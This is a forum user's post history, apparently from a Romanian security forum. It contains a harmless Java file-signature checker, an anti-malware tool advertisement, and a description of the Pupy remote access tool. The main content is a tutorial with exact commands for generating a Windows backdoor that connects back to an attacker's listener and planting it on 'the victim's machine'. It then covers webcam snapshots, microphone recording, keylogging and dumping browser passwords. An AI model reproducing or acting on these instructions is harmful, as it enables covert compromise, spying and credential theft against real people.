qps1
-
Posts
38 -
Joined
-
Last visited
Posts posted by qps1
-
-
Verifica semnaturile de fisier(Magic number).
package org.malc0de.corejava; import java.io.File; import java.io.FileInputStream; import java.io.IOException; import java.util.Arrays; /** * */ public class MagicNumberChecker { /** * Default Constructor */ public MagicNumberChecker() { } public boolean verifyFileHeader(File file, int[] magicNumber) { try(FileInputStream fis = new FileInputStream(file)) { for (int i : magicNumber) { if (fis.read() != i) { return false; } } } catch (IOException e) { e.printStackTrace(); } return true; } public boolean verifyFileHeader(File file, byte[] magicNumber) { try(FileInputStream fis = new FileInputStream(file)) { byte[] buffer = new byte[magicNumber.length]; if(fis.read(buffer) != -1) { return Arrays.equals(magicNumber, buffer); } } catch (IOException e) { e.printStackTrace(); } return false; } public static void main(String... strings) { final int[] SQLITE3_MAGIC_HEADER = { 0x53, 0x51, 0x4c, 0x69, 0x74, 0x65, 0x20, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x20, 0x33, 0x00 }; final byte[] SQLITE3_MAGIC_HEADER2 = { (byte) 0x53, (byte) 0x51, (byte) 0x4c, (byte) 0x69, (byte) 0x74, (byte) 0x65, (byte) 0x20, (byte) 0x66, (byte) 0x6f, (byte) 0x72, (byte) 0x6d, (byte) 0x61, (byte) 0x74, (byte) 0x20, (byte) 0x33, (byte) 0x00 }; MagicNumberChecker mnc = new MagicNumberChecker(); File file = new File(mnc.getClass().getResource("resources/test.db").getFile()); if (mnc.verifyFileHeader(file, SQLITE3_MAGIC_HEADER)) { System.out.println("Valid Sqlite3 Database!"); } else { System.out.println("Invalid Sqlite3 Database!"); } if (mnc.verifyFileHeader(file, SQLITE3_MAGIC_HEADER2)) { System.out.println("Valid Sqlite3 Database!"); } else { System.out.println("Invalid Sqlite3 Database!"); } } }
-
-
-
Let's begin
1. The first step is to open your terminal and then cd into the pupy directory where you put, and then enter as rootCod: cd /c/tools/rat/pupy/pupy/
2.Now, let's create a simple windows x86 backdoor, execute this command
Cod: ./pupygen.py -f exe_x86 -o backdoor.exe connect --host 10.42.0.1:9999 -t tcp_cleartext
The output will be like this:
f you're getting the output just like mine it means you're on the right path ready to rock and roll
3. Pupy has it own listener called 'pupy shell', so let's start our listener. Run this command :Cod: ./pupysh.py -p 9999 -t tcp_cleartext
* -p is the port that pupy shell wil listen
* -t is the transport layer that we wanna use, be sure to use the right transport , it should be the same as the backdoor we generate beforeThe output will be like this:
4. Now your job is to put the backdoor in the victim's machine and then execute it
5. Wait until you get session like this
6. Do whatever you want, you can see the available modules with list_modules command
If you wanna run the module you just have to type 'run category/module'
An example running a troll message box module
Cod: >>> run troll/msgbox --title error "pwned by pupy"You can also take a snapshot from the victim's webcam, record microphone scanning keystrokes, dumping password from browsers and much more as this project is growing up.
You can also generate backdoor to connect your vps or your ddns! -
Pupy
Pupy este un OpenSource , multi-platforma(WIN,Linux,OSX,Android).Este un RAT(instrument de administrare de la distanta) si un instrument de post-exploatare.In principal este scris in Python.
Modulele Pupy pot accesa în mod transparent obiecte Python de la distan?ă folosind rpyc pentru a efectua diverse activită?i interactive.
Pupy poate genera sarcini utile în mai multe formate, cum ar fi executabilele PE, DLL-uri, fi?iere Python pure, PowerShell, apk, ...
-Alege un lansator (connect,bind...), un transport(ssl,http,rsa,obfs3,scramblesuit,...) si un numar de "scriptlets".Scriptlets sun scripturi menite sa fie incorporate pentru a efectua sarcini diverse off-line(fara a necesista o sesiune), cum ar fi adaugarea de persistenta, de a porni un keylogger, detectarea de sandbox.Caracteristici
-Pe ferestre, Pupy este compilat ca un DLL si este incarcat in memorie.
-Poate migra reflexiv in alte procese.
-Poate importa la distanta, din memorie, pachete python pure(PY,.PYC), Pyhton C(.pyd).
-Pupy este usor extensibil, foloseste[rpyc].
-Pupy poate comunica folosind si obfsproxy.Toate modulele non interactive pot fi expediate la gazde multiple intr-o singura comanda.
-Multi-platforma(testat pe win 7,8,10,kali linux,ubuntu,OSX,Android)
-In mai multe formate exe(x86, x64), dll (x86, x64), Python, apk, ...Transport
-rsa
-Un strat cu autentificare sicriptare folosind RSA si AES256, de multe ori cu alte straturi suprapuse.
-Strat folosind o cheie AES256 statica
-Ssl(defaut)
-http
- obfs3 -cu ajutorul stratului rsa pentru o securitate mai buna.
-etc.
Windows Specific
-migreaza
-functioneaza foarte bine cu [mimitakz]
-screenshot
-inregistrare microfon
-keylogger
-inregistrare tastatura
-capturi de ecran la fiecare click
-etc
Screenshots
https://github.com/n1nj4sec/pupy/wiki/ScreenshotsInstall
git clone https://github.com/n1nj4sec/pupy.git pupy
cd pupy
git submodule update --init --depth 1 pupy/payload_templates
git submodule init
git submodule update
pip install -r requirements.txt-
8
-
Riot Isolator - free anti-malware solution
in Programe securitate
Posted
Features:
Anti-RunPE
Anti-webcam
Anti-keylogger
Anti-screenshot
Anti-extension spoofing
Effective network monitor
Full drive and MFT eraser
System recycle bin cleaner
Anonym live online panel
Real-time packer information
Secure file and folder shredder
Block unwanted or all USB volumes
Unlock blocked/ used files with ease
System requirements:
Windows Vista or newer
.Net Framework 4
Windows Aero enabled
1GB Ram
Dual core CPU
Up to six webcams
Up to six monitors
Download
License: HFL